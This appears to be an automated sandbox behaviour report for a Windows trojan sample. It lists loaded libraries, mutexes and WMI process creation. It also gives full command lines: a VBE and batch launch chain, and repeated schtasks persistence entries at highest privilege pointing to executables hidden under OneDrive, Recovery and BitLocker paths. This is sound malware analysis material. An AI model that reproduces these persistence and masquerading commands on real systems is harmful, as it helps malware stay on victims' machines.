                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeCode function: 29_2_00007FFD9BADAD3D29_2_00007FFD9BADAD3D
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeCode function: 36_2_00007FFD9BAB0DA336_2_00007FFD9BAB0DA3
                                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AOsWDEPp.log 0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: String function: 0050F5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: String function: 0050EC50 appears 56 times
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: String function: 0050EB78 appears 39 times
                                    Source: f3I38kv.exe, 00000000.00000003.1662694922.0000000002E50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs f3I38kv.exe
                                    Source: f3I38kv.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs f3I38kv.exe
                                    Source: f3I38kv.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: classification engineClassification label: mal100.troj.evad.winEXE@35/44@0/0
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_004F6C74 GetLastError,FormatMessageW,0_2_004F6C74
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_0050A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0050A6C2
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\wKTFMmGz.logJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeMutant created: NULL
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeMutant created: \Sessions\1\BaseNamedObjects\Local\36ee50d7d201ff2376332adc828fa2641c4dc216989787c8e03018bbdc024ca7
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6452:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7092:120:WilError_03
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\AppData\Local\Temp\w5nv0ZNcR9Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockbrowserdllCommon\ZUKrGOW39NDMa.bat" "
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCommand line argument: sfxname0_2_0050DF1E
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCommand line argument: sfxstime0_2_0050DF1E
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCommand line argument: STARTDLG0_2_0050DF1E
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCommand line argument: xzT0_2_0050DF1E
                                    Source: f3I38kv.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: f3I38kv.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\Desktop\f3I38kv.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: f3I38kv.exeReversingLabs: Detection: 52%
                                    Source: C:\Users\user\Desktop\f3I38kv.exeFile read: C:\Users\user\Desktop\f3I38kv.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\f3I38kv.exe "C:\Users\user\Desktop\f3I38kv.exe"
                                    Source: C:\Users\user\Desktop\f3I38kv.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockbrowserdllCommon\KvkJOplk2GTpcDyjoXWpi6SQDRLpKp2SGwZjihDz.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockbrowserdllCommon\ZUKrGOW39NDMa.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe "C:\blockbrowserdllCommon/hyperruntimemonitorCommon.exe"
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyFn" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Microsoft\nGnJvqnFLoRdIZNyVoMyF.exe'" /f
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyF" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\nGnJvqnFLoRdIZNyVoMyF.exe'" /rl HIGHEST /f
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyFn" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\Microsoft\nGnJvqnFLoRdIZNyVoMyF.exe'" /rl HIGHEST /f
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SIHClientS" /sc MINUTE /mo 10 /tr "'C:\Recovery\SIHClient.exe'" /f
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SIHClient" /sc ONLOGON /tr "'C:\Recovery\SIHClient.exe'" /rl HIGHEST /f
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SIHClientS" /sc MINUTE /mo 7 /tr "'C:\Recovery\SIHClient.exe'" /rl HIGHEST /f
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\dllhost.exe'" /f
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\dllhost.exe'" /rl HIGHEST /f
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\dllhost.exe'" /rl HIGHEST /f
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyFn" /sc MINUTE /mo 10 /tr "'C:\Users\user\Saved Games\nGnJvqnFLoRdIZNyVoMyF.exe'" /f
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyF" /sc ONLOGON /tr "'C:\Users\user\Saved Games\nGnJvqnFLoRdIZNyVoMyF.exe'" /rl HIGHEST /f
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyFn" /sc MINUTE /mo 8 /tr "'C:\Users\user\Saved Games\nGnJvqnFLoRdIZNyVoMyF.exe'" /rl HIGHEST /f
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyFn" /sc MINUTE /mo 6 /tr "'C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe'" /f
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyF" /sc ONLOGON /tr "'C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe'" /rl HIGHEST /f
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyFn" /sc MINUTE /mo 11 /tr "'C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe'" /rl HIGHEST /f
                                    Source: unknownProcess created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe "C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe"
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qVPGMYvCwM.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: unknownProcess created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe "C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe "C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe"
                                    Source: C:\Users\user\Desktop\f3I38kv.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockbrowserdllCommon\KvkJOplk2GTpcDyjoXWpi6SQDRLpKp2SGwZjihDz.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockbrowserdllCommon\ZUKrGOW39NDMa.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exe "C:\blockbrowserdllCommon/hyperruntimemonitorCommon.exe"Jump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qVPGMYvCwM.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe "C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exe" Jump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\f3I38kv.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: version.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
